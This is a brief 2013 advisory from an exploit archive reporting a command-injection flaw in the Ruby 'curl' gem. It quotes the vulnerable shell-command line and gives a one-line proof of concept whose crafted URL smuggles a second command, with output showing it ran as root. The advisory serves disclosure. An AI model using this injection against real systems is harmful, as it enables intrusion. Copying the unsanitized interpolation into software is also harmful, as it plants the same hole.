Ruby Gem Curl Command Execution Vulnerability

2013-03-13T00:00:00
ID 1337DAY-ID-20506
Type zdt
Reporter Larry Cashdollar
Modified 2013-03-13T00:00:00

Description

Ruby Gem Curl suffers from a remote command execution vulnerability due to a lack of user input sanitization.

                                        
                                            Curl Ruby Gem Remote command execution
3/12/2013

https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines:

131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)

PoC:

page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

[email protected]:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org

#  0day.today [2018-04-08]  #